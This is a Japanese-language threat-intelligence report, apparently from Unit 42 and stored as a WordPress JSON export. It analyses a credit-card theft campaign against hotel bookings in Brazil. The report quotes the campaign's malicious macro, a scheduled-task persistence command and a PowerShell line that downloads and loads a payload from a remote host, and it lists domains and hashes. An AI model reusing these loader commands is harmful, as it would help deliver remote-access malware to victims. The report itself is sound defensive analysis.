{"id":101359,"date":"2019-03-12T12:00:14","date_gmt":"2019-03-12T19:00:14","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=101359\/"},"modified":"2019-11-25T21:55:30","modified_gmt":"2019-11-26T05:55:30","slug":"operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business","status":"publish","type":"post","link":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/","title":{"rendered":"Comando\u4f5c\u6226: \u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u7a83\u53d6\u30d3\u30b8\u30cd\u30b9\u3092\u683c\u5b89\u3067\u52b9\u679c\u7684\u306b\u904b\u55b6\u3059\u308b\u65b9\u6cd5"},"content":{"rendered":"

\u6982\u8981<\/h2>\n

2018\u5e7412\u6708\u3001Palo Alto Networks\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u8abf\u67fb\u30c1\u30fc\u30e0Unit 42\u306e\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306f\u9032\u884c\u4e2d\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u78ba\u8a8d\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306f\u30db\u30b9\u30d4\u30bf\u30ea\u30c6\u30a3\u30bb\u30af\u30bf\u3001\u3068\u304f\u30db\u30c6\u30eb\u306e\u4e88\u7d04\u306b\u91cd\u70b9\u3092\u7f6e\u3044\u3066\u3044\u307e\u3057\u305f\uff61\u6700\u521d\u306e\u5206\u6790\u3067\u306f\u3068\u304f\u306b\u76ee\u65b0\u3057\u3044\u30c6\u30af\u30cb\u30c3\u30af\u3084\u9ad8\u5ea6\u306a\u30c6\u30af\u30cb\u30c3\u30af\u306f\u898b\u3064\u304b\u308a\u307e\u305b\u3093\u3067\u3057\u305f\u304c\u3001\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u898b\u305b\u308b\u57f7\u62d7\u3055\u306b\u8208\u5473\u3092\u5f15\u304b\u308c\u307e\u3057\u305f\uff61<\/p>\n

\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u306e\u75d5\u8de1\u3092\u305f\u3069\u308a\u3001\u305d\u3053\u304b\u3089\u3053\u306e\u653b\u6483\u8005\u304c\u6b8b\u3057\u305f\u60c5\u5831(C2 \u4e0a\u306e\u95b2\u89a7\u53ef\u80fd\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3001\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u306e\u30e1\u30bf\u30c7\u30fc\u30bf\u3001\u30d0\u30a4\u30ca\u30ea\u306e\u7279\u6027\u306a\u3069)\u306b\u63a2\u7d22\u3092\u5e83\u3052\u307e\u3057\u305f\u3002\u3053\u3053\u304b\u3089\u30ab\u30b9\u30bf\u30e0\u30e1\u30a4\u30c9\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u304c\u898b\u3064\u304b\u308a\uff64\u3053\u308c\u3092 \u300cCapturaTela\u300d\u3068\u540d\u4ed8\u3051\u307e\u3057\u305f\u3002\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u3092\u767a\u898b\u3057\u305f\u3053\u3068\u3067\u3001\u306a\u305c\u30db\u30c6\u30eb\u306e\u4e88\u7d04\u304c\u4e3b\u306a\u653b\u6483\u30d9\u30af\u30bf\u30fc\u3068\u3057\u3066\u57f7\u62d7\u306b\u72d9\u308f\u308c\u3066\u3044\u308b\u306e\u304b\u3068\u3044\u3046\u7406\u7531\u304c\u5206\u304b\u308a\u307e\u3057\u305f\uff61\u3064\u307e\u308a\uff64\u9867\u5ba2\u304b\u3089\u306e\u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u60c5\u5831\u7a83\u53d6\u3092\u72d9\u3063\u3066\u3044\u305f\u306e\u3067\u3059\u3002<\/p>\n

\u79c1\u305f\u3061\u306f\u3053\u306e\u653b\u6483\u8005\u306e\u30d7\u30ed\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u307e\u3057\u305f\u3002\u305d\u306e\u7d50\u679c\u3001\u653b\u6483\u8005\u304c\u3068\u308b\u914d\u4fe1\u30e1\u30ab\u30cb\u30ba\u30e0\u306e\u307b\u304b\u306b\uff64RAT(\u30ea\u30e2\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u30c4\u30fc\u30eb)\u3084\u60c5\u5831\u7a83\u53d6\u7528\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306a\u3069\u306e\u5e38\u7528\u30c4\u30fc\u30eb\u306b\u3064\u3044\u3066\u5224\u660e\u3057\u307e\u3057\u305f\uff61\u5f7c\u3089\u306f\u305d\u3046\u3057\u305f\u30c4\u30fc\u30eb\u3092GitHub\u30ea\u30dd\u30b8\u30c8\u30ea\u306b\u3042\u308b\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u30c4\u30fc\u30eb\u3084\u30a2\u30f3\u30c0\u30fc\u30b0\u30e9\u30a6\u30f3\u30c9\u30d5\u30a9\u30fc\u30e9\u30e0\u304b\u3089\u5165\u624b\u3057\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n

\u7686\u3055\u3093\u306f\uff64\u653b\u6483\u8005\u304c\u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u7a83\u53d6\u4e8b\u696d\u3092\u683c\u5b89\u3067\u52b9\u679c\u7684\u306b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u3092\u8abf\u67fb\u3057\u3066\u3044\u308b\u3068\u3053\u308d\u904b\u55b6\u3059\u308b\u65b9\u6cd5\u306b\u3064\u3044\u3066\u7591\u554f\u306b\u601d\u3063\u305f\u3053\u3068\u306f\u3042\u308a\u307e\u3059\u304b\uff61\u3060\u3068\u3059\u308c\u3070\u300cComando\u4f5c\u6226\u300d\u306b\u3064\u3044\u3066\u305c\u3072\u304a\u8aad\u307f\u304f\u3060\u3055\u3044\u3002<\/p>\n

\u653b\u6483\u8005\u306e\u914d\u4fe1\u30e1\u30ab\u30cb\u30ba\u30e0<\/h2>\n

\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u30c6\u30ec\u30e1\u30c8\u30ea\u3067\u306f\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u304c\u4e3b\u306a\u914d\u4fe1\u30e1\u30ab\u30cb\u30ba\u30e0\u3068\u3057\u3066\u7279\u5b9a\u3055\u308c\u30012018\u5e748\u6708\u306b\u6700\u521d\u306e\u95a2\u9023\u30b5\u30f3\u30d7\u30eb\u304c\u914d\u4fe1\u3055\u308c\u305f\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u653b\u6483\u8005\u304c\u3088\u304f\u4f7f\u7528\u3059\u308b\u30c8\u30d4\u30c3\u30af\u306f\u65c5\u884c\u306e\u4e88\u7d04\u3084\u30d0\u30a6\u30c1\u30e3\u30fc\u306b\u95a2\u9023\u3057\u305f\u3082\u306e\u3067\u3001\u4e3b\u306b\u30d6\u30e9\u30b8\u30eb\u4eba\u3092\u5bfe\u8c61\u306b\u3057\u3066\u3044\u307e\u3059\u3002\u88681\u306f\u3001\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u4e2d\u306b\u898b\u3064\u304b\u3063\u305f\u4ee3\u8868\u7684\u306a\u4ef6\u540d\u3068\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d\u306e\u4ee3\u8868\u7684\u306a\u30ea\u30b9\u30c8\u3067\u3059\u3002<\/p>\n\n\n\n\n\n\n\n\n
\u30e1\u30fc\u30eb\u306e\u4ef6\u540d<\/strong><\/td>\n\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d<\/strong><\/td>\n<\/tr>\n
Reserva para tres quartos<\/td>\n\"Ficha cadastral Leticia Ferreira Mendes.ppam\", \"Ficha cadastral Jacinto Mendes da Silva.ppam\", \"Ficha cadastral Marcos Portela Correa.ppam\", \"Ficha cadastral Francisco Prado.ppam\"<\/td>\n<\/tr>\n
Reserva Veirano Advogador<\/td>\nRoominglist Veirano Advogados .docx<\/td>\n<\/tr>\n
Corrigir data da reserva para o dia 03<\/td>\nBooking \u2013 Dados da Reserva.docx<\/td>\n<\/tr>\n
Voucher para reserva<\/td>\nVoucher para reserva 02.docx<\/td>\n<\/tr>\n
Reserva<\/td>\nVoucher de Reserva ADRIANA MILLER RODRIGUES.ppa<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

\u88681\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u4ee3\u8868\u3059\u308b\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u4ef6\u540d\u3068\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d<\/p>\n

\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u60aa\u610f\u306e\u3042\u308b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u3092\u8abf\u67fb\u3057\u305f\u3068\u3053\u308d\u3001\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30e1\u30bf\u30c7\u30fc\u30bf\u306b\u8208\u5473\u6df1\u3044\u4e00\u8cab\u6027\u304c\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u4f5c\u6210\u8005\u306f\u5fb9\u5e95\u3057\u3066\u982d\u5b57\u8a9e\u300cCDT Original\u300d\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u306e\u3067\u3059(\u8a73\u7d30\u306f\u56f31\u3067\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044)\u3002<\/p>\n

\"\u56f31
\u56f31 \u60aa\u610f\u306e\u3042\u308b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u306e\u30e1\u30bf\u30c7\u30fc\u30bf\u30b5\u30f3\u30d7\u30eb<\/figcaption><\/figure>\n

\u653b\u6483\u8005\u306f\u591a\u304f\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u898b\u3089\u308c\u308b\u4e00\u822c\u7684\u306a\u65b9\u6cd5\u3092\u8907\u6570\u5229\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u305f\u3068\u3048\u3070\uff64MSHTA\u304c\u5b9f\u884c\u3059\u308b\u30ea\u30e2\u30fc\u30c8\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5916\u90e8\u53c2\u7167\u3059\u308b\u3053\u3068\u306a\u3069\u3067\u3059\uff61\u3053\u306e\u30a2\u30d7\u30ed\u30fc\u30c1\u306e\u304a\u304b\u3052\u3067\u3001\u653b\u6483\u8005\u306f\u81ea\u8eab\u306e\u6d3b\u52d5\u306b\u4f7f\u3046\u30c4\u30fc\u30eb\u3084\u30ea\u30bd\u30fc\u30b9\u3092\u8907\u6570\u898b\u3064\u3051\u3089\u308c\u307e\u3059\uff61\u540c\u6642\u306b\u30a2\u30ca\u30ea\u30b9\u30c8\u306b\u3088\u308b\u30a2\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\uff64\u8ffd\u8de1\u3092\u3088\u308a\u56f0\u96e3\u306b\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u89b3\u6e2c\u3055\u308c\u305f\u65b9\u6cd5\u306e\u306a\u304b\u3067\u3082\u3063\u3068\u3082\u4e00\u822c\u7684\u306a\u7d44\u307f\u5408\u308f\u305b\u3092\u56f32\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n

\"\u56f32
\u56f32 \u8907\u6570\u306e\u914d\u4fe1\u30e1\u30ab\u30cb\u30ba\u30e0<\/figcaption><\/figure>\n

2018\u5e7412\u6708\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u914d\u4fe1\u3055\u308c\u305f\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u30b5\u30f3\u30d7\u30eb\u3068\u3057\u3066\u898b\u3066\u307f\u307e\u3057\u3087\u3046\uff61\u3053\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u306b\u6dfb\u4ed8\u3055\u308c\u3066\u3044\u305f\u30d5\u30a1\u30a4\u30eb\u306f\u4f1a\u8b70\u5ba4\u30ea\u30b9\u30c8(SHA256: ac70d15106cc368c571c3969c456778b494d62c5319)\u3092\u507d\u88c5\u3057\u3066\u3044\u3066\uff64\u56f32\u306b\u793a\u3057\u305f\u30d7\u30ed\u30bb\u30b9\u306e\u3072\u3068\u3064\u3092\u4f7f\u3063\u3066\u914d\u4fe1\u3055\u308c\u3066\u3044\u307e\u3057\u305f\uff61\u56f33\u306b\u8a18\u8f09\u3057\u305f\u306e\u304c\u305d\u306e\u8a73\u7d30\u306a\u30d7\u30ed\u30bb\u30b9\u3067\u3059\uff61<\/p>\n

\"\u56f33
\u56f33 2018\u5e7412\u6708\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u306e\u914d\u4fe1\u30b5\u30f3\u30d7\u30eb<\/figcaption><\/figure>\n

\u60aa\u610f\u306e\u3042\u308b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u306b\u306f\u3001MSHTA\u3092\u4f7f\u7528\u3057\u3066\u30ea\u30e2\u30fc\u30c8\u306b\u30db\u30b9\u30c8\u3055\u308c\u305f\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3059\u308b\u5358\u7d14\u306a\u30de\u30af\u30ed\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n

Public Sub Auto_Open()\r\n   var0 = \"MSHTA https:\/\/bit[.]ly\/2QXNTHi\"\r\n   Var = var0\r\n   Shell (Var)\r\nEnd Sub<\/pre>\n
\u30e9\u30f3\u30c7\u30a3\u30f3\u30b0\u7528URL\u306f\u6b21\u306eURL\u306b\u89e3\u6c7a\u3055\u308c\u307e\u3059\u3002<\/p>\n
hxxps:\/\/internetexplorer200[.]blogspot[.]com\/<\/span><\/p>\n
bit.ly\u4e0a\u306eURL\u77ed\u7e2e\u30ea\u30f3\u30af\u306e\u7d71\u8a08\u306f\u5f0a\u793e\u306e\u30c6\u30ec\u30e1\u30c8\u30ea\u3067\u306e\u89b3\u6e2c\u5185\u5bb9\u3092\u88cf\u4ed8\u3051\u308b\u3082\u306e\u3067\u3057\u305f\uff61\u56f34\u306e\u300c12\u670827\u65e5\u304b\u308928\u65e5\u306b\u304b\u3051\u3066\u306eBit.ly\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u5206\u5e03\u300d\u304b\u3089\u3082\u5206\u304b\u308b\u3068\u304a\u308a\uff64\u653b\u6483\u8005\u306f\u4e3b\u306b\u30d6\u30e9\u30b8\u30eb\u3092\u30bf\u30fc\u30b2\u30c3\u30c8\u3068\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n
\"\u56f34
\u56f34 12\u670827\u65e5\u304b\u308928\u65e5\u306b\u304b\u3051\u3066\u306eBit.ly\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u5206\u5e03<\/figcaption><\/figure>\n
MSHTA\u306f\u3001\u3054\u304f\u5358\u7d14\u306a\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3057\u3066\u30a8\u30f3\u30b3\u30fc\u30c9\/\u96e3\u8aad\u5316\u3055\u308c\u305fVBScript\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u5b9f\u884c\u3057\u307e\u3059(\u30b3\u30fc\u30c9\u5168\u4f53\u306b\u30dd\u30eb\u30c8\u30ac\u30eb\u8a9e\u306e\u5358\u8a9e\u304c\u3042\u308b\u3053\u3068\u306b\u6ce8\u610f\u3057\u3066\u304f\u3060\u3055\u3044)\u3002<\/p>\n
\"\u56f35
\u56f35 MSHTA\u3092\u4ecb\u3057\u3066\u5b9f\u884c\u3055\u308c\u308b\u7b2c1\u6bb5\u968e\u306eVBScript\u30b3\u30fc\u30c9<\/figcaption><\/figure>\n
\u3053\u308c\u306b\u3088\u308a\u3001\u6b21\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u304c\u30b7\u30b9\u30c6\u30e0\u5185\u306b\u4f5c\u6210\u3055\u308c\u3001\u305d\u3053\u3067\u5225\u306e\u30ea\u30e2\u30fc\u30c8\u30ed\u30b1\u30fc\u30b7\u30e7\u30f3\u304b\u3089MSHTA\u3092\u4ecb\u3057\u3066\u65b0\u3057\u3044\u7b2c2\u6bb5\u968e\u306eVB\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u3082\u30b3\u30e1\u30f3\u30c8\u306b\u300cCDT\u300d\u3078\u306e\u8a00\u53ca\u304c\u898b\u3089\u308c\u308b\u3053\u3068\u306b\u6ce8\u76ee\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n
\"set shhh = CreateObject(\\\"WScript.Shell\\\")\\r\\n\u00a0\u00a0 Dim var1\\r\\n var1 = \\\"cmd.exe \/c SchTasks \/Create \/sc MINUTE \/MO 240 \/TN AdobeUpdateSD \/TR \\\"\\\".exe https:\/\/minhacasaminhavidacdt.blogspot[.]com\/\\\"\\r\\nshhh.run var1, vbHide\\r\\n\"\r\n<\/pre>\n
\"\u56f36
\u56f36 \u7b2c2\u6bb5\u968e\u306eVB\u30b9\u30af\u30ea\u30d7\u30c8<\/figcaption><\/figure>\n
\u3053\u306e\u7b2c2\u6bb5\u968e\u306eVB\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u3001PowerShell\u30ea\u30d5\u30ec\u30af\u30b7\u30e7\u30f3\u3092\u4ecb\u3057\u3066\u6700\u7d42\u7684\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30e1\u30e2\u30ea\u306b\u30ed\u30fc\u30c9\u3057\u3001GIF\u306e\u62e1\u5f35\u5b50\u3092\u6301\u3064\u30d5\u30a1\u30a4\u30eb\u304b\u3089\u30d0\u30a4\u30ca\u30ea\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u53d6\u5f97\u3057\u307e\u3059\u3002<\/p>\n
\"CreateObject(\\\"Wscript.Shell\\\").run\u00a0 \\\"cmd.exe \/c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [Reflection.Assembly]::Load([Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http:\/\/achoteis.com[.]br\/images\/64.gif'))).EntryPoint.Invoke($null,$null)\\\"\\r\\n\"\r\n<\/pre>\n
\u3053\u306e\u30b1\u30fc\u30b9\u3067\u914d\u4fe1\u3055\u308c\u3066\u3044\u308b\u6700\u5f8c\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u5546\u7528\u30c4\u30fc\u30ebRevenge Remote Access Trojan(RAT)\u3067\u3059\u3002\u3053\u306e\u30c4\u30fc\u30eb\u3092\u4f7f\u3046\u3053\u3068\u3067\uff64\u60c5\u5831\u7a83\u53d6\u304c\u5bb9\u6613\u306b\u306a\u308a\u307e\u3059\uff61<\/p>\n
\u30a4\u30f3\u30d5\u30e9\u5206\u6790<\/h2>\n
\u30a4\u30f3\u30d5\u30e9\u306e\u30ec\u30d9\u30eb\u3092\u898b\u3066\u307f\u308b\u3068\uff64\u653b\u6483\u8005\u306fDuckDNS\u3001WinCo\u3001No-IP\u306a\u3069\u306e\u52d5\u7684DNS(DDNS)\u30b5\u30fc\u30d3\u30b9\u3092\u5229\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u591a\u304f\u306f\u7121\u6599\u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u63d0\u4f9b\u3057\u3066\u3044\u308b\u306e\u3067\uff64\u653b\u6483\u8005\u304c\u30a4\u30f3\u30d5\u30e9\u306b\u304b\u3051\u308b\u6295\u8cc7\u3092\u524a\u6e1b\u3057\u3066\u304f\u308c\u307e\u3059\u3002\u4f7f\u7528\u4e2d\u306e\u30c9\u30e1\u30a4\u30f3\u30b5\u30f3\u30d7\u30eb\u3092\u88682\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n\n\n\n\n\n\n
\u52d5\u7684DNS\u30c9\u30e1\u30a4\u30f3<\/strong><\/td>\n<\/tr>\n
systenfailued.ddns[.]com[.]br<\/td>\n<\/tr>\n
office365update[.]duckdns[.]org<\/td>\n<\/tr>\n
cdtoriginal[.]ddns[.]net<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
\u88682 \u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u3066\u3044\u308b\u30c9\u30e1\u30a4\u30f3\u30b5\u30f3\u30d7\u30eb\u306e\u3046\u3061DDNS\u30d7\u30ed\u30d0\u30a4\u30c0\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u3082\u306e<\/p>\n
\u7121\u6599\u30b5\u30fc\u30d3\u30b9\u3001\u30da\u30fc\u30b9\u30c8\u30b5\u30a4\u30c8\u3001\u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30a4\u30c8\u306a\u3069\u306e\u5229\u7528\u306b\u304f\u308f\u3048\u3066\u3001\u304a\u305d\u3089\u304f\u306f\u653b\u6483\u8005\u304c\u6240\u6709\u3057\u3066\u3044\u308b\u3068\u601d\u308f\u308c\u308b\u30c9\u30e1\u30a4\u30f3\u304c\u5c11\u306a\u304f\u3068\u30821\u3064\u7279\u5b9a\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30c9\u30e1\u30a4\u30f3\"fejalconstrucoes[.]com[.]br\"\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30db\u30b9\u30c8\u3057\uff64\u6f5c\u5728\u7684\u306a\u88ab\u5bb3\u8005\u306b\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u3066\u304d\u307e\u3057\u305f\u3002\u56f37\u306f\uff64DNS WHOIS\u30ec\u30b3\u30fc\u30c9\u306b\u8868\u793a\u3055\u308c\u308b\u30c9\u30e1\u30a4\u30f3\u306e\u8a73\u7d30\u3067\u3059\uff61\u3053\u306e\u30c9\u30e1\u30a4\u30f3\u306f\u30d6\u30e9\u30b8\u30eb\u306eUOL\u30b5\u30fc\u30d3\u30b9\u3092\u5229\u7528\u3057\u3066\u767b\u9332\u3055\u308c\u3066\u3044\u307e\u3057\u305f\uff61<\/p>\n
\"\u56f37
\u56f37 DNS WHOIS\u30ec\u30b3\u30fc\u30c9<\/figcaption><\/figure>\n
\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u5c5e\u3059\u308b\u60aa\u610f\u306e\u3042\u308b\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u4ed8\u304d\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u306f\u3001\u6b21\u306e\u3088\u3046\u306a\u7279\u5fb4\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n
\u30c9\u30e1\u30a4\u30f3: fejalconstrucoes[.]com[.]br<\/span>
\n\u9001\u4fe1\u8005: mmcorrea@fejalconstrucoes.com.br, marcos@fejalconstrucoes.com.br<\/span>
\n\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d: Contrato Anual FEJAL Constru\u00e7oes.ppa<\/span><\/p>\n
\u5148\u306b\u8ff0\u3079\u305f\u3088\u3046\u306b\u3001\u3053\u306e\u653b\u6483\u8005\u306f\uff64\u81ea\u8eab\u306e\u4f7f\u7528\u3059\u308b\u30c9\u30e1\u30a4\u30f3\u3084\u30d1\u30b9\u306b\u7e70\u308a\u8fd4\u3057\u982d\u5b57\u8a9e \u300cCDT\u300d\u3092\u4f7f\u7528\u3059\u308b\u3068\u3044\u3046\u8208\u5473\u6df1\u3044\u7279\u5fb4\u304c\u898b\u3089\u308c\u307e\u3059\uff61<\/p>\n
hxxp:\/\/bit[.]ly\/cdtqueda<\/span>
\nhxxp:\/\/cdtoriginal.ddns[.]net<\/span><\/p>\n
\u30d3\u30b8\u30cd\u30b9\u306b\u8ca2\u732e\u3059\u308b\u4e3b\u306a\u8981\u56e0\u306f\u300cCapturaTela\u300d<\/h2>\n
\u672c\u4ef6\u306e\u8abf\u67fb\u4e2d\uff64C2\u4e0a\u306b\u95b2\u89a7\u53ef\u80fd\u306a\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u304c\u898b\u3064\u304b\u308a\uff64\u3053\u3053\u304b\u3089\u653b\u6483\u8005\u304c\u4f7f\u7528\u3057\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u3044\u304f\u3064\u304b\u898b\u3064\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u88683\u306b\uff64\u898b\u3064\u304b\u3063\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u306e\u7d44\u307f\u3042\u308f\u305b\u4e00\u89a7\u3092\u793a\u3057\u307e\u3059\u3002\u3053\u3053\u3067\u3082\u3084\u306f\u308a\u982d\u5b57\u8a9e \u300cCDT\u300d\u304c\u30d5\u30a1\u30a4\u30eb\u540d\u306b\u7e70\u308a\u8fd4\u3057\u5229\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n\n\n\n\n\n
\u30d5\u30a1\u30a4\u30eb\u540d<\/strong><\/td>\nSHA256<\/strong><\/td>\n<\/tr>\n
CDT.hta<\/td>\n4485a8f339171ca86f7e38b912f0f28072ffe04404d5062af3a60f322566f870<\/td>\n<\/tr>\n
Copia Detalhe da reserva \u2013 Booking.ppam<\/p>\n
 <\/td>\n
ac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187<\/p>\n
 <\/td>\n<\/tr>\n
DadosDaReserva.doc<\/p>\n
 <\/td>\n
03483d2e701f8f90c9cc46b37f12f1cef995e4cca4b5c4b9e67947f560275677<\/p>\n
 <\/td>\n<\/tr>\n
DillI.js<\/p>\n
 <\/td>\n
d5f4d7fb7c8042b047e9f3d93d5f02841f01889ba8a899c0c1ed7064129e3bb4<\/p>\n
 <\/td>\n<\/tr>\n
quasar.jse<\/p>\n
 <\/td>\n
03d7de252c30c87d6b156b4fbcdcd008ef6bae319a9c42613aaa01428bd490e3<\/p>\n
 <\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
\u88683 cdtmaster[.]com[.]br\u306e\u95b2\u89a7\u53ef\u80fd\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3067\u78ba\u8a8d\u3067\u304d\u305f\u5185\u5bb9<\/p>\n
\u30d5\u30a1\u30a4\u30eb\u540d\u3053\u305d\u300cquasar.jse\u300d\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u304c\uff64\u305d\u306e\u4e2d\u8eab\u306fQuasarRAT\u3067\u306f\u306a\u304f\uff64base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30d9\u30fc\u30b7\u30c3\u30af\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u30c9\u30ed\u30c3\u30d1\u30fc(\u56f38\u53c2\u7167)\u3092\u542b\u3080JS\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u3057\u305f\uff61\u8abf\u67fb\u3057\u3066\u307f\u308b\u3068\uff64\u3054\u304f\u30b7\u30f3\u30d7\u30eb\u3067\u3059\u304c\u8208\u5473\u6df1\u3044\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u898b\u3089\u308c\u307e\u3057\u305f\u3002<\/p>\n
\"\u56f38
\u56f38 base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u30c9\u30ed\u30c3\u30d1\u30fc\u3092\u542b\u3080JS\u30b9\u30af\u30ea\u30d7\u30c8<\/figcaption><\/figure>\n
\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u306f.NET\u3067\u4f5c\u6210\u3055\u308c\u305fPE\u30d5\u30a1\u30a4\u30eb\u3067\uff64\u60c5\u5831\u7a83\u53d6\u6a5f\u80fd\u3092\u5099\u3048\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u306a\u304b\u3067\u30e1\u30a4\u30f3\u3068\u306a\u308b\u30e1\u30bd\u30c3\u30c9\u306e1\u3064\u304c\u300cCapturaTela\u300d\u3067\uff64\u79c1\u305f\u3061\u306f\u3053\u3053\u304b\u3089\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u540d\u524d\u3092\u4ed8\u3051\u307e\u3057\u305f\uff61\u305d\u306e\u30dd\u30eb\u30c8\u30ac\u30eb\u8a9e\u306e\u540d\u524d\u304c\u793a\u3059\u3088\u3046\u306b\u3001\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3092Bitmap\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3068\u3057\u3066\u4fdd\u5b58\u3059\u308b\u6a5f\u80fd\u3092\u5099\u3048\u3066\u3044\u307e\u3059\u3002<\/p>\n
\"\u56f39
